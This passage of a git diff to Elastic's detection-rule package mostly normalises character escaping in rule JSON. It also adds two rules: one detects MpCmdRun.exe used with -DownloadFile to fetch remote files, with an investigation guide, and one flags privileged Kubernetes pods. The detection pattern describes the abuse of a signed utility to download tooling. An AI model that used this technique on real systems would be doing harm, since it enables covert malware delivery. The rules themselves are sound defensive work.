'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109.json new file mode 100644 index 00000000000..fc1b88d7da0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via MpCmdRun", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", + "references": [ + "https://twitter.com/mohammadaskar2/status/1301263551638761477", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json index 5bfeed2cf26..b3e70d8a800 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json index ff2decf1f3c..e2b77ac4a99 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json index 196631f2c1c..79df7d46db7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json index b8a6fe14123..bf106a4503b 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json index f455d19a4d3..71bd1d18dac 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json index 39a6e6029cf..4085e81768d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json index 30fd487afea..de9d15b4c2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json index 9ca0cf5e0d6..8a2a516c683 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json index 1b5ce9bc1d6..5881c796206 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json index 521c272f863..d0dd3c19098 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json index 0dd62cb279b..9804ce3475d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json index d876105778e..2c12b08e7e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json index 8471af114eb..ece6c0fdbe8 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json +++ b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json index 7e9a296dbc2..d2bb64e13b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json +++ b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_203.json b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_203.json new file mode 100644 index 00000000000..c2ade88ab0c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_203.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects when a user creates a pod/container running in privileged mode. A highly privileged container has access to the node's resources and breaks the isolation between containers. If compromised, an attacker can use the privileged container to gain access to the underlying host. Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.", + "false_positives": [ + "By default a container is not allowed to access any devices on the host, but a \"privileged\" container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. An administrator may want to run a privileged container to use operating system administrative capabilities such as manipulating the network stack or accessing hardware devices from within the cluster. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\"" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Privileged Pod Created", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:pods\n and kubernetes.audit.verb:create\n and kubernetes.audit.requestObject.spec.containers.securityContext.privileged:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n", + "references": [ + "https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF", + "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.image", + "type": "text" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.securityContext.privileged", + "type": "boolean" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c7908cac-337a-4f38-b50d-5eeb78bdb531", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1610", + "name": "Deploy Container", + "reference": "https://attack.mitre.org/techniques/T1610/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "c7908cac-337a-4f38-b50d-5eeb78bdb531_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json index 51195b5b419..e394d750166 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json index 9c2392a80f3..d6eadd27d4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json index 4adc2ed99a7..240a3699810 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json index b46ad7cac2b..20af9a95147 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json index 2c6b34cf600..4049f54c566 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL 